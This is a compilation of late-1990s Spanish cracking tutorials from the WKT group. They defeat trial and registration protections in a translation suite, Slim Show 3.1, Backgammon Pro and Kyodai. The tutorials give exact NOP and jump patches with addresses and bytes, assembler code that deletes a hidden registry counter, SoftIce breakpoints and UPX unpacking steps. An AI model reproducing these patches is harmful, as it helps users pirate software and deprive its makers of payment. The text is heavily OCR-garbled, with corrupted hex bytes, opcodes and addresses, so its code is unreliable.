muchas horas trazar toda esta porquería. 

Ok Boyz, esto demuestra que al igual que existen cracks de fuerza bruta también se 

pueden encontrar protecciones de este estilo, donde la falta de originalidad se suple 

con miles de líneas de código de chequeo redundante (el exe principal tiene 3,4 

Mb!!!). Desde el punto de vista del programador será un éxito... aunque ello 

implique tener que bajarse 20Mb para 4 usos de evaluación. 

Es bien sabido que MrCrimson debe atender a diario una infinidad de compromisos 

amorosos y por ello, la opción más rápida tomó cuerpo definitivamente: Let's crack! 


ny 
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Segundo Intento: TechFact95 


La pregunta de siempre: ¿Cómo sabe esta bestezuela que hemos agotado el número 
de usos permitidos?. La información al respecto debe haberse almacenado en: 


e El registro 

e Algún fichero INI 

e En algún fichero de la instalación 

e Alguna combinación esoterica de las anteriores 


Para saberlo usamos TechFacts95. Que se puede decir de esta joyita que no se haya 
dicho ya...? Bueno, pues os la recomiendo porque sólo hay una cosa peor que NO 
tener información y es TENER DEMASIADA. Eso es lo que sucede a menudo con 
el clasico Regmon, por ejemplo. Trazar TODAS las ocurrencias en el registro 
durante la ejecución de un programa suele reportar cientos de lecturas/escrituras que 
dificilmente nos permite ver las cosas con claridad. 

TechFact, entre otras muchas cosas genera un informe compacto de cambios en el 
sistema (INIs, ficheros en general, Registro, etc) ocurridos al ejecutar un programa. 
Al aplicarlo a este caso, NO reportó ningúna modificación relevante... nada en el 


registro, nada en ficheros, nada en INlTs... 

Era de esperar. Una vez que ha expirado el programa ya no se hace ninguna 
modificación y por tanto es indetectable el mecanismo de conteo de usos... 

Así las cosas volvemos al origen para tener de nuevo el programa recien instalado. 
Ahora SI monitorizamos con TechFacts los cambios en las sucesivas ejecuciones del 
programa (las 4 primeras modo “demo” y las sucesivas en modo 'Mal-function”: 


1* ejecución: 

se crean algunas entradas en el registro que tienen por nombres cosas como: Custom 
Colours, Custom Windows, General Settings y cosas por el estilo... 

Y algo más...aparece una key llamada: 


HKEY_LOCAL_MACHINENConfigW000M Other Flags 


Esta clave contiene mas de 2000 bytes y lo que la hace singular, aparte de ese 
nombre tan sospechoso, es que NO ESTA en el registro junto con el resto de claves 
del programa. Al contrario está en una zona en la que NADIE la relacionaria con 
ESL...(1lamadlo Zen si os place). 


e 27,3” y 4” ejecuciones: En cada ejecución se producen cambios en algunos 
valores contenidos en “Other Flags” 


. 5 ejecución (primera ilegal): Vuelven a modoficarse los valores de “Other 
Flags” pero esta vez será la definitiva. 


e 6” y sucesivas ejecuciones: NO se producen más cambios. 


Sea lo que sea está claro que mantiene una relación con el número de usos...! 


> , 
ha 


Primer éxito 


Si mis sospechas son ciertas prodriamos 'resetear' el conteo de usos introduciendo en 
el registro la clave “Other Flags” tal y como era después de la primera ejecución 
(momento en que se creó). Para esto exporté al principio la clave “virgen” desde el 
regedit de manera que pudiera volver a introducirla ejecutando el script *.reg 

Voila. Al ejecutar el programa todo parece funcionar EXACTAMENTE igual que la 
primera vez. 

Hasta ha desaparecido el “Expired version” de la cabecera de la ventana. Al 
preguntar al programa por el status nos dice que nos quedan 4 usos...:0) 

Sucesivas ejecuciones reproducen la secuencia explicada al inicio de este tute, de 
manera que a la quinta vez estamos de nuevo “expired”... En este punto podemos 
tener tantos usos como queramos, eso si, “refrescando” el registro cada cuatro 
ejecuciones.... :0( 

Parece que todo sería perfecto si pudieramos evitar la modificación de los valores en 
“Other Flags” 


>, 
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Manos arriba 


Empieza la acción. Hay que buscar la llamada a la función de la API 

RegQuery ValueEx que es la responsable de cargar en memoria el contenido de una 
clave del registro. Siguiéndole la pista sabremos donde se modifica y podemos 
EVITARLO. La sintaxis de esta función es como sigue: 


LONG RegQueryValueEx ( 

HKEY hKey, // handle of key to query 
LPTSTR lpValueName, // address of name of value to 
query 


LPDWORD lpReserved, // reserved 

LPDWORD l1pType, // address of buffer for value 
type 

LPBYTE lpData, // address of data buffer 

LPDWORD lpcbData // address of data buffer size 


); 


Se suceden muchas llamadas a esta función, aunque después de trazar un poco se 
hace evidente que las de interés suceden en : 


* Reference To: advapi32.RegQueryValueExA, Ord:0000h 


:0045210A E83150FBFF Cal1 00407140 
:0045210F 85C0 test eax, eax 
:00452111 742E je 00452141 
:00488D8D B1B4 mov cl, B4 
:00488D8Fr E8BO9EF7EFF call 00402C44 --> 
Modificación 

:00488D94 FF45EC inc [ebp-14] 


Para poner un breakpoint a la que nos interesa hacemos: 
Bpx 00452104 IF *(* (ESP+4))==6568744F 


El segundo argumento de la función, ya en la pila, debe apuntar a “Other Flags”, 
6568744f son los codigos ascii de los primeros 4 caracteres invertidos (“ehtO”.) 
El valor de la clave leído por RegQuery ValueExa es apuntado a la salida por el 5* 
argumento y en esa posicion de memoria instalamos un BPM [address] W para 
detectar escritura... 


El resultado no es muy sorprendente. El CALL en 488D8F es el responsable de las 
actualizaciones. Para poder neutralizar este CALL, primero comprobamos que la 
pila permanece igual despues de la ejecución. A continuación procedemos a escribir 
un crack que cambie: 


:00488D8F E8BO9EF7FF call 00402C44 
por 


:00488D8F 9090909090 nop nop nop nop nop 


Hacemos los chequeos de rigor y comprobamos que restaurando el registro al valor 
original de “Other Flags” y ejecutando esi.exe parcheado como se ha indicado 
disponemos del programa como si fuera SIEMPRE la primera vez...:0) 


> , 
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Ahora todo junto... 


La cosa marcha pero debemos arrastrar los 2Kb de datos de “Other flags? como parte 
del crack???...no es muy elegante. 

Forcemos un poco la máquina. 

La clave se crea en el registro durante la primera ejecución y a partir de ese 
momento cambia en cada uso. Realmente el estado original no ocurre con la clave 
virgen sino CON NINGUNA CLAVE en absoluto!. 

Probamos borrando la “Other flags”.... Yeah! En la primera ejecución se crea una 
nueva clave que permite 4 usos más. Al haber parcheado la rutina actualizadora 
(descontadora de usos) esta situacion se mantiene para siempre. 

Nuestro crack ahora es infinitamente más manejable: parchear 5 bytes y borrar una 
clave del registro. 


Oy 
Ven 
Borrar datos en el registro 


Para eliminar claves del registro no son validos los scripts *.reg que usamos para 
añadirlas. Además pretendemos que el crack este contenido en un UNICO fichero. 
Como eliminamos nuestra “Other Flags”...? 

Pues con autoexplicada funcion de la API: 


LONG RegDeleteKey ( 

HKEY hKey, // handle of open key 

LPCTSTR lpSubKey // address of name of subkey to 
delete 

5 


Con el siguiente trocito de código añadido al parcheador resolvemos el tema: 
(crackeamos en winasm32, nooo?) 


. const 
Clave db "Configi0001",0 
Flags db "Other Flags",0 
«data? 
Hwndr dd ? 
¡Abre 
invoke RegOpenKeyEx, HKEY_LOCAL_ MACHINE, ¿rama 
offset Clave, ¿Clave 
NULL, 
KEY_SET_VALUE, ¿modo apertura 


offset Hwndr ¿handle de 


Clave abierta 


¿Borra 
invoke RegDeleteValue, Hwndr, ¿handle de 
Clave a borrar 
offset Flags ¿nombre de 

valor a borrar 
¡Cierra 
invoke RegCloseKey, Hwndr ¿cierra clave 
abierta 
Sencillo, ein? 

>» 

Ve 


Estertores 


Una vez concluidos los arreglos anteriormente comentados pasé algun tiempo 
haciendo pruebas. Todo parecía funcionar correctamente hasta que un amiguete 
detectó que cada 100 frases traducidas aparecía una ventana recordando que en la 
version demo ese era precisamente el límite. Esto NO bloqueaba el programa, sólo 
esperaba confirmación y continuaba funcionando correctamente. 

Muy engorroso, el recordatorio, eso sí.. 


"Un MessageBox...", pensé y busqué el disparador, la comparación que activaba la 
llamada... No fue facil. 

Tenía todo el aspecto de una MessageBox PERO NO LO ERA. Se trataba de una 
ventana construida a trozos, el icono, el botón, el texto. Todo se añadía paso a paso a 
lo largo de un proceso muy dificil de detectar en origen. Comparando la secuencia 
de instrucciones que se ejecutaban cuando se traducía la frase N* 98 con la 
correspondiente a la N” 99 encontramos la bifurcación en: 


:0063BE96 FFO58C7F 6400 inc dword ptr 
[00647F8C] 

:0063BE9C 833D8C7F 640064 cmp dword ptr 
[00647F8C], 00000064 

:0063BEA3 0F8C34010000 31 0063BFDD <==- 
bifurca 


La verdad es que me sorprendió encontrar una comparacion directa con el 100 (64h). 
Ni siquiera había intentado buscar el literal porque no imaginé un conteo tan 
transparente en este código de protección celulítica... 

Obviamente, en [647F8C] se mantiene la cuenta de frases traducidas que al llegar a 
100 bifurca el código para comenzar a montar su ventana a trozos. Como os podreis 
imaginar, para acabar con esto eliminamos la instrucción de incremento: 


:0063BE96 FFO58C7F 6400 inc dword ptr 
[00647F8C] 


cambia a: 


:0063BE96 909090909090 nop nop nop nop nop 
nop 


Y eso es todo lo que hace falta. 
Os 
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ADDENDUM: El caso Win NT 


Por lo general, las protecciones de software no suelen depender de si el software 
corre bajo Win9x o NT. Este no es el caso. 


Las instrucciones detalladas anteriormente NO desprotegen ESI bajo NT. 

Cabe esperar que los programadores de este invento hubieran desarrollado otra 
protección totalmente diferente bajo NT para desalentar al cracker....? No, no cabe. 
Demasiado trabajo. Un poco de maquillaje será suficiente :0). 


El truco es exactamente el mismo. El contador de usos vuelve a estar sutilmente 
camuflado en el registro, pero esta vez en DOS CLAVES: 


e HKEY_USERS1.DEFAULTControl Panel AppearancelCustom Colours 


e HKEY_CURRENT_USERNSoftwarelWord Magic SoftwarelWord Magic 
WTools Preferences Dictionary Access 


Los nombres no delatan la finalidad de estos datos que parecen valores de 
configuración de la aplicación. 


Pues bien, el proceso se repite. Primero hay que eliminar las DOS claves 
SIMULTANEAMENTE y luego anular la 
llamada a la funcion encargada de actualizar el conteo: 


:00488EB8 B1B4 mov cl, B4 
:00488EBA E8859DF7EFF call 00402C44 <---- 
Noppear 

:00488EBF FF45EC inc [ebp-14] 


Ambos procesos han sido ya explicados con lo que el tema queda zanjado. 
Gracias a todos por el interés mostrado. 


MrCrimson 


Finale 


e Hay otros detalles cosméticos que no afectan a la proteccion ni al 
funcionamiento del programa y que por tanto no voy a detallar. 

e Tampoco he quitado la NAG porque en este caso NO forma parte de la 
protección (no tiene mayor complicación). 

e El presente software se plantea como una suite que en su version demo 
contiene además otro programa: WordMagic. El razonamiento para 
desprotegerlo es exactamente el mismo. 

e La suite completa alberga otros programas NO incluidos en la DEMO y por 
lo tanto no analizados. 


Espero que este texto te sirva para ampliar tu repertorio de técnicas. 
Y huelga decirlo, a estas alturas, pero: 
Si te gusta el programilla de marras, paga los derechos de uso! 
el presente tute SOLO pretende poner de manifiesto la inutilidad de este 
tipo de protecciones densas. Además, perjudican al usuario hinchando 
los ejecutables e incrementando el tiempo de descarga. 


Up The Hammer! 
MrCrimson/[WkT!99] 


[ Entrada | Documentoz Genéricoz | WKT TEAM Main Site ] 


[ Todo el ECD | x Tipo de Protección | x Fecha de Publicación | x orden Alfabético ] 


ESTUDIO COLECTIVO DE DESPROTECCIONES 


e 
Whiskey Kon Tekila 


Whiskey Kon Tekila 


progrAmA Slim Show 3.1 W 
| DESCripCión — [Interactive Multimedia Authoring Software for MS-Windows 
A 
url MA PA 
| protECCión — [Algunas Limitaciones si no estás registrado. 
Aaa MAA 
FECHA [29 de Septiembre de 1998 


Wen 
Introducción 
Saludos. 
Cumpliendo un encargito de "Estado+Porcino”, yo Mr.Pink resuelve un facil 
puzzle. 


Crackear Slim Show 3.1. 
Site: WWW.pcww.com 


Al Atake 


Buscamos la cadena Shareware con un buscador de Cadenas como el Search and Replace. 

La encontramos en el ejecutable. Bien, la protección no está diseminada. 

Desensamblamos con el Wdasms8.9 (si no tienes esta version completa del desensamblador, buscadlo 
esta por todas partes).En "String Refereces” no encontramos Shareware. 

Así pues cogemos la artillería pesada, el IDA Pro. 

Desensamblamos y buscamos la cadena "Shareware". Con cuidado, ya que las cadenas aparecen en 
vertical: 


ooooooooo 
ooooooooo 
0dJp=So3non»v>»>mVA 


Y esto es lo que encontramos: 


dseg03:2B56 57 db 57h ; W 
dseg03:2B57 41 db 41h; A 
dseg03:2B58 52 db 52h; R 
dseg03:2B59 4EÉE db 4Eh ; N 
dseg03:2B5A 49 db 49h; I 
dseg03:2B5B 4EÉE db 4Eh ; N 
dseg03:2B5C 47 db 47h; G 
dseg03:2B5D 00 db ¡BES 

dseg03:2B5E 43 db 43h; C 
dseg03:2B5F 41 db 41h; A 
dseg03:2B60 4E db 4Eh ; N 
dseg03:2B61 20 db 20h ; 

dseg03:2B62 4F db 4Fh y; O 
dseg03:2B63 4E db 4Eh ; N 
dseg03:2B64 4C db 4Ch jj L 
dseg03:2B65 59 db 5%h ; Y 
dseg03:2B66 20 db 20h ; 

dseg03:2B67 53 db 53h; S 
dseg03:2B68 41 db 41h; A 
dseg03:2B69 56 db 56h; V 
dseg03:2B6A 45 db 45h; E 
dseg03:2B6B 20 db 20h ; 

dseg03:2B6C 55 db. 55h. U 
dseg03:2B6D 50 db 50h ; P 
dseg03:2B6E 20 db 20h ; 

dseg03:2B6F 54 db 54h ; T 
dseg03:2B70 4F db 4Fh y; O 
dseg03:2B71 20 db 20h ; 

dseg03:2B72 32 db 32h; 2 
dseg03:2B73 35 db 35h; 5 


dseg03:2B74 20 db 20h ; 


dseg03:2B75 53 db 53h ; 
dseg03:2B76 43 db 43h; 
dseg03:2B77 45 db 45h ; 
dseg03:2B78 4EÉE db  4Eh ; 
dseg03:2B79 45 db 45h; 
dseg03:2B7A 53 db: 53h: 
[AER KK KK KARA RA RRA RARAS 
dseg03:3399 54 db 54h ; 
dseg03:339A 68 db 68h ; 
dseg03:339B 69 db 6%h ; 
dseg03:339C 73 db 73h y; 
dseg03:339D 20 db 20h ; 
dseg03:339E 69 db 6%h ; 
dseg03:339F 73 db 73h y; 
dseg03:33A0 20 db 20h ; 
dseg03:33A1 61 db 61h ; 
dseg03:33A2 20 db 20h ; 
dseg03:33A3 73 db 73h y; 
dseg03:33A4 68 db 68h ; 
dseg03:33A5 61 db  6lh ; 
dseg03:33A6 72 db 72h ; 
dseg03:33A7 65 db 65h ; 
dseg03:33A8 77 db 77h ; 
dseg03:33A9 61 db  6lh ; 
dseg03:33AA 72 db 72h ; 
dseg03:33AB 65 db 65h ; 
dseg03:33AC 20 db 20h ; 
dseg03:33AD 65 db 65h ; 
dseg03:33AE 64 db 64h ; 
dseg03:33AF 69 db 6%h ; 
dseg03:33B0 74 db 74h ; 
dseg03:33B1 69 db 6%h ; 
dseg03:33B2 6F db  6EFh ; 
dseg03:33B3 6É db  6Eh ; 
[AAA KK RARA RARAS 
dseg03:345A 54 db 54h ; 
dseg03:345B 68 db 68h ; 
dseg03:345C 65 db 65h ; 
dseg03:345D 20 db 20h ; 
dseg03:345E 73 db 73h y; 
dseg03:345F 68 db 68h ; 
dseg03:3460 61 db  6lh ; 
dseg03:3461 72 db 72h y; 
dseg03:3462 65 db 65h ; 
dseg03:3463 77 db 77h ; 
dseg03:3464 61 db  6lh ; 
dseg03:3465 72 dab- 12h: 5 
dseg03:3466 65 db 65h ; 
dseg03:3467 20 db 20h ; 
dseg03:3468 65 db 65h ; 
dseg03:3469 64 db 64h ; 
dseg03:346A 69 db 6%h ; 


0) 


(0 E e E O a E O O 0R030RYmp¡p>)0nN 


0R030R Y 70m 


2 0 


KKKKKKKKKkk kk kk / 


dseg03:346B 74 db 74h; t 
dseg03:346C 69 db 6%h ; 1 
dseg03:346D 6F db 6Fh ; oO 
dseg03:346E 6É db 6Eh ; n 


[AAA KK AR RARA RARA ARA RARAS 


Comenzemos por quitar la restricción de 25 escenas. 
Para ello buscamos 2B56 (Offset del mensaje de Error de 25 escenas) 
Lo encontramos en : 


cseg01:460A loc_0_460A: ¿ CODE XREF: sub_0_43D2+233.]3 
cseg01:460A 33 CO xor ax, ax 
cseg01:460C 50 push ax 
cseg01:460D B8 5E 2B mov ax, 2B5Eh 
cseg01:4610 1E push ds 
cseg01:4611 50 push ax 
cseg01:4612 B8 56 2B mov ax, 2B56h 
; BINGO. Mensaje de Error. 
cseg01:4615 1E push ds 
cseg01:4616 50 push ax 
cseg01:4617 B8 40 00 mov ax, 40h ; 'b' 
cseg01:461A 50 push ax 
cseg01:461B 9A 00 00 2B 29 Call MESSAGEBOX 


[FAR KK ARK AAA Y 


Este trozo de código es llamado por: 


cseg01:45DC C6 86 F8 FE OA mov [bp+var_108], 0Ah 

¿ Contamos a partir de 10 
cseg01:45E1l 8B 46 OA mov ax, [bptrarg_4] 
cseg01:45E4 8B 56 0C mov dx, [bp+rarg_6] 
cseg01:45E7 89 86 02 FF mov word ptr [bp+var_FE], ax 
cseg01:45EB 89 96 04 EF mov word ptr [bp+rvar_FE+2], dx 
cseg01:45EF 
cseg01:45EF loc_0_45EF: ¿ CODE XREF: sub_0_43D2+42E.]3 
cseg01:45EF 8B C2 mov ax, dAXx 
cseg01:45F1 OB 86 02 EF or ax, word ptr [bp+var_FE] 
cseg01:45F5 74 29 3z loc_0_4620 
cseg01:45F7 F6 46 12 02 test [bp+arg_C], 2 
cseg01:45FB 75 03 jnz loc_0_4600 
cseg01:45FD E9 C2 00 Jjmp loc_0_46C2 
cseg01:4600 ¡AAAAAARAAA RARA AAA AR ARA AA RA RARA RARA A AAA ARA RAR ARA 
cseg01:4600 
cseg01:4600 loc_0_4600: ¿ CODE XREF: sub_0_43D2+229.]3 
cseg01:4600 80 BE F8 FE 23 cmp [bp+var_108], 23h 

"4"; LLAMADA AL MENSAJE DE ERROR 

cseg01:4605 7D 03 Jge loc_0_460A 
cseg01:4607 E9 B8 00 Jjmp loc_0_46C2 


[AAA KK KK KK ARA RRA RAR RAR RARA ARAS 


MADRE DE MITRA, que astucia tienen estos programadores. 

En vez de contar a partir de uno, cuentan a partir de 10 (por eso la comprobacion en cseg01:4600 con 
23h=35). 

Asi despistaremos a esos estúpidos crackers que nuncan se imaginaran un truco tan orgásmico. 
Como podeis ver, to el meollo lo lleva la variable [bp+var_108]. 

Asi pues sigamos buscando [bp+var_108] y encontramos: 


cseg01:47F0 26 8B 57 6A mov dx, es: [bx+6Ah] 
cseg01:47F4 89 86 02 EF mov word ptr [bp+rvar_FE], ax 
cseg01:47F8 89 96 04 EF mov word ptr [bp+var_FE+2], dx 
cseg01:47FC FE 86 F8 FE inc [bp+var_108] 

¿ l!!AQUI!!. aumentamos la cuenta. 
cseg01:4800 E9 EC FD jmp loc_0_45EF 
cseg01: 4803 ¡AAAARAARAAA AA RARA AA RRA RARA RARA RARA RA AAA AA RARA RARA 


[AAA KK RARA RRA RARA AAA ARA KARA Y 


El crack es sencillo nopeemos: 


cseg01:47FC FE 86 F8 FE inc [bp+var_108]; !!AQUI!! 
por 
cseg01:47FC 90 90 90 90 NOP NOP NOP NOP 


En el ejecutable 53fc)h=90 90 90 90 
Y listo, nunca mas se incrementará la variable. 


Quitemos ahora los horribles mensajes shareware, siguiendo la misma técnica. 
Localizemos 3399 y obtenemos: 


seg01:B236 9A 28 00 2B_ 29 Call GETDLGITEM 
cseg01:B23B 50 push ax 
cseg01:B23C B8 99 33 mov ax, 339%h 
cseg01:B23F 1E push ds 
cseg01:B240 50 push ax 


Este trozo es llamado por: 


cseg01:B203 Al 20 47 ¿ABOUTDLG+1F 6.3 

cseg01:B203 mov ax, word_14AA 4720 
cseg01:B206 48 dec ax 

cseg01:B207 74 0F 3z loc_0_B218 
cseg01:B209 48 dec ax 

cseg01:B20A 74 6A 3z loc_0_B276 
cseg01:B20C 48 dec ax 

cseg01:B20D 74 79 Z loc_0_B288 
cseg01:B20F 48 dec ax 

cseg01:B210 75 03 jnz loc_0_B215 


cseg01:B212 E9 85 00 jmp loc_0_B29A 


asi pues quien parte el bacalao es: word_14AA_ 4720 

Pero analizando un poco con el Sice vemos que este es un bucle de llamadas a mensajes, así que es 
mejor no tocarlo. 

Por tanto, desactivemos la llamada al nag de inicio. Para ello abrimos el Sice y ponemos bpx 
dialogboxparam y lanzamos el ejecutable. 

Boom, aparecemos en el Sice, pulsamos F12 (pulsamos OK) y de nuevo Fl2. 

Aparecemos en: 


cseg01:0901 B8 01 00 mov ax, 1 

cseg01:0904 50 push ax 

cseg01:0905 OE push eo 

cseg01:0906 ES A7 A6 Call near ptr sub_0_AFBO 
cseg01:0909 83 C4 02 add sp, 2 

cseg01:090C B8 D5 51 mov ax, 51D5h 


Este trozo no es llamado de forma condicional por nadie, está incrustado el la rutina principal, así que 
nada mejor que desactivarla, cambiándola por: 


cseg01:0901 EB 09 jmp 90€ 

cseg01:0903 90 NOP 

cseg01:0904 50 push ax 

cseg01:0905 OE push cs 

cseg01:0906 ES A7 A6 Call near ptr sub_0_AFBO 
cseg01:0909 83 C4 02 add sp, 2 

cseg01:090C B8 D5 51 mov ax, 51D5h 


Asi pues En el ejecutable: 1501)h=EB 09 90 
Y Listo. Que lo disfruteis. 


Saludos Mr Pink. 
Siempre a las órdenes de Estado+Porcino. 


- 
Vi 
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progrAmA Backgammon Pro W95 
[| DESCripCión [luego de sobremesa. 
A 
| protECCión — |Límite de 9 partidas si no estás registrado. 
| DiFiCultAD — [1) Principiante, 2) Amateur, 3) Aficionado, 4) Profesional, 5) Especialista 
| hErrAmiEntAs — [Wdasm 8.9, Editor Hexadecima 
ak MBR 
era ade 


Wen 


Introducción 


El programa controla que no se puedan jugar más de 9 partidas sin haberse registrado. 
Per ello, utiliza 2 marcadores para guardar el número de partidas jugadas : 


e enel registro, en 
HKEY_LOCAL_MACHINEISOFTWAREWinGames.InAProBackgammoniGames 
Played 

e enun fichero, el CAWindowsW gi.Ini en el offset 240 


Al iniciarse el programa, se leen estos dos valores, y si son diferentes o mayores de 9, no se 
podrá jugar ninguna partida. 


Al Atake 


Si sólo se quiere poner el contador de partidas a O, se puede hacer a mano, editando el registro con el 
RegEdit, y modificando el Wg¡1.Ini con un editor hexadecimal. 

(O sea, editar el CAWindowsW gi.Ini y en el offset 240 poner 00. Después ejecutar el RegEdit.Exe, 
buscar "games played" y poner el valor 0 ) 

Pero claro, no es ni cómodo ni elegante, así que mejor meterse en el pgm... ;-) 


Abrir el WDasm, Open File to Disassemble y cargar el ProBack.Exe. 
Ahora que ya tenemos el pgm desensamblado, vamos a cargarlo con Ctrl-L (Load Process). 
Va bene, ahora ya podemos empezar a debugarlo. 


Mirar en Refs/String Data References para ver que textos utiliza el pgm. 
Al hacer doble click sobre uno de ellos, se mostrará en que parte del código se usa. 
Seguir haciendo doble click para ver las siguientes localizaciones. 


En este caso, el valor que nos puede interesar es "Registration Number". 

Después de hacer doble click, apretamos PF2 para poner un BreakPoint. O sea, que el debugger se 
parará en esta instrucción. 

En total, hay 5 referencias a "Registration Number". 

Mirando un poco el código de alrededor de los BreakPoints, se pueden ver las llamadas a las 
funciones del API de windows. 

Así podemos intuir que se hace con el "Registration Number” en cada uno de los 5 BreakPoints : 


e El primero(Line:26749 Pg 319) es para la llamada a RegQueryValueExA 
e El segundo i cuarto (Line:26807 1 28940) son para la llamada a RegCreateKeyExA 
e El tercero i quinto (Line:26829 1 28966) son para la llamada a RegSetValueExA 


Iniciamos la ejecución del pgm con PF9(Run), y se parará en :0040FB5C ,(Line:26749 Pg 319) : 


* Possible StringData Ref from Data Obj ->"Registration Number" 


:0040FB5C 6834764400 push 00447634 

:0040FB61 50 push eax 

:0040FB62 C744243404000000 mov [esp+34], 00000004 
:0040FB6A FFD7 Call edi 

:0040FB6C 85C0 test eax, eax 

:0040FB6E 7404 je 0040FB74 

:0040FB70 895C2424 mov dword ptr [esp+24], ebx 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :0040FB6E (C) 


:0040FB74 8B4C2410 mov ecx, dword ptr [esp+10] 
:0040FB78 51 push ecx 
:0040FB79 FFD5 call ebp 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :0040FB4A(C) 


:0040FB7B 8B542414 mov edx, dword ptr [esp+14] 
:0040FB7F 52 push edx 
:0040FB80 FFD5 call ebp 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :0040FB2F (C) 


:0040FB82 8B442424 mov eax, dword ptr [esp+24] 
:0040FB86 8B4C2418 mov ecx, dword ptr [esp+18] 
:0040FB8A 3BC1 cmp eaxX, ecx 
:0040FB8C 0F84AA000000 je 0040FC3C 


Después de unos pocos PES, se llega a :0040FB8C je 0040FC3C ,(Line:26777 Pg 319) 
Caliente,caliente ;-))) Que pasaria si en lugar de "je" hubiera un "¡ne" ;-? ;-DDD 

Pues sí, un simple BIT (de je(84h) a jne(85h)) hace que todas las protecciones queden anuladas (tanto 
la pantalla de propaganda inicial, como el límite de las 9 partidas ;-) 


Os recomiendo imprimir las páginas 319-321 y intentar seguirlas un poco juntamente con el Debug 
para ver por donde va pasando y que va haciendo. 
Por ejemplo, la comprobación de partidas jugadas se hace en : 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :0040FC70(C) 


:0040FCC7 A1F8B54400 mov eax, dword ptr [0044B5F8] 
:0040FCCC 8B542410 mov edx, dword ptr [esp+10] 
:0040FCDO B90B000000 mov ecx, 0000000B 

:0040FCD5 3B5004 cmp edx, dword ptr [eax+04] 
:0040FCD8 7407 je 0040FCE1 

:0040FCDA 894C2410 mov dword ptr [esp+10], ecx 
:0040FCDE 894804 mov dword ptr [eax+04], ecx 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :0040FCD8 (C) 

:0040FCE1 394C2410 cmp dword ptr [esp+10], ecx 
:0040FCE5 730A jnb 0040FCF1 

:0040FCE7 C705C8B5440001000000 mov dword ptr [0044B5C8], 00000001 


El valor del registro "games played" está en EDX, el valor del fichero Wg1.Ini está en EAX, y el 
máximo de partidas permitidas está en ECX (0Bh=10d) 


Ya para acabar, sólo falta modificar el fichero ProBack.Exe con un Editor hexadecimal. 
Es facil localizar la posición, ya que el Wdasm indica el offset dentro del fichero. (Ej: E-Offset 
0000EF8SCh in File:ProBack.exe) 


ESTUDIO COLECTIVO DE DESPROTECCIONES 


WKT Tutorialz Site | 


Whiskey Kon Tekila 


Programa Kyodai v0.2 Kyodai v0.2 21 | W95/W98/NT | /W98 / NT 
Descripción Kyoday es un adictivo juego que consiste en ir localizando las PEA parejas de 
elementos. 
o Tipo A de 30 dias 


Url _. — __—_________— 


Protección Serial Number 
[Dificultad Dificultad |1) Principiante, 2) 11) Principiante, 2) Amateur, 3) Aficionado, 4) Profesional, 5) Especialista 3) Aficionado, 4) Profesional, 5) 11) Principiante, 2) Amateur, 3) Aficionado, 4) Profesional, 5) Especialista 
ProcDump v1.50, Gettyp for Dos v2.33, Softlce v3.24, W32dasm v8.93, UltraEdit 
Herramientas 
v6.10a 
Objetivo | Objetivo [Obtención de un número de Serie Válido de ¡Obtención de un número de Serie Válido número de Serie Válido 


Cracker Mr.WhiTe 
Fecha 17 de Octubre de 1999 


Introducción 


En este tutorial aprenderemos cómo descomprimir un exe con el procdump y cómo 
obtener un número de serie válido. No hay mucho más que contar. Si todavia no has 
usado el Procdump te recomiendo que leas mi Tutorial sobre el Winboost 2000. 


Went 


Toma de contacto 


Newbies: Seguimos avanzando :0) 
Al abrir el programa nos aparece una horrible ventana que nos recuerda nuestro 
lamentable estado de usuario no registrado. Sniff, que triste. :0) 


Si buscamos en los tipicos menus, encontraremos una opción de registro 
introduciendo un número de serie. Veamos el mensaje de error que nos muestra. 
"Sorry, wrong password.....etc" 

jeje. Cargamos el Wdasm v8.93 y buscamos entre las "string references" a ver si sale 
esa frase. Shit!! no hay ¿? ¿Qué pasa? 


Pues muy sencillo, el ejecutable estará seguramente comprimido. 
Vi 


Estupendo. Vamos a comprobar que compresor ha utilizado el autor. Para ello cargamos el Gettyp y le 
indicamos que abra el kyodai.exe. Ummmtf, aparece un error relacionado con el DOS. jeje. Parece que vamos a 
necesitar la version para DOS del Gettyp. Una vez localizado y configurado (realmente lo mejor es no 
configurarlo) abrimos la ventanita de Ms-Dos y escribimos "gt.exe kyodai.exe" ummmmm, nos dice que esta 
comprimido con el UPX. :o) 


Abrete sésamo 


Ahora que ya sabemos que compresor ha usado el autor, abrimos el Procdump, seleccionamos unpack y le 
indicamos el UPX. Se carga el Kyodai... volvemos al Procdump y pulsamos el boton. Esperamos....., por fin 
nos sale una ventana para guardar la versión descomprimida del jueguecito. Vaya, si que estaba comprimido!! 
:0) 


Es hora de volver al Wdasm a ver esas bonitas "string references”. Bingo!! ahora si que se ven 
Tenemos que encontrar aquel feo mensaje de error que nos aparece al introducir un serial incorrecto. Lo 
localizamos en :004648BC 


* Referenced by a (Ujnconditional or (Cjonditional Jump at Address: 


:D0046484C S8D4DFS lea ecx, dword ptr [ebp-08] 
:004648A4F 2A174B2A4900 mov eax, dword ptr [0049BA74] 
:004648B4 S8B00 mov eax, dword ptr [eax] 
:004648B6 SBS0DCOS50D0O mov eax, dword ptr [eax+000005DC] 


* Possible StringData Ref from Data 0b3j ->"Sorry, wrong password. Please " 


Muy bien, estamos sobre la pista. Lo que necesitamos es evitar que el programa llegue a este mensaje. Así que 
subimos un poco y miramos desde donde se llega aquí. 


* Referenced by a (U)nconditional or (Cjonditional Jump at Address: 


|:0046480C(C) 

| 

200464873 ESC4F1F9FF call 0040343C 

200464878 A174BA4900 mov eax, dword ptr [0049BA74] 
:00464387D SBOO mov eax, dword ptr [eax] 
:004648384 84C0 test al, al 

200464886 7424 je 00464814C 

200464888 SD4DFS lea ecx, dword ptr [ebp-08] 
:00464388B 4174BA4900 mov eax, dword ptr [0049B274] 
: 00464890 8B00 mov eax, dword ptr [eax] 
:00464892 SBS0DCOSO00O mov eax, dword ptr [eax+000005DC] 


Como podemos observar, al mensaje de error se llega desde un salto condicional en: 
:00464886 7424 je 004648 AC 


Pero lo verdaderamente interesante es esa Call que aparece justo encima del salto, antes de comprobar el valor 
de AL. 


Apuntemos el OFFSET porque será un buen lugar para empezar a jugar con el Softlce. :0) 
:0046487F 


Cargamos en el Softlce el archivo que hemos descomprimido antes con el procdump y nos las arreglamos para 
poner un Breakpoint justo en :0046487F. Para ello lo mejor es entrar en el Kyodai a traves de la función 
HMEMCPY y una vez que estamos dentro del código del kyodai ponemos el "bpx 0046487F". 


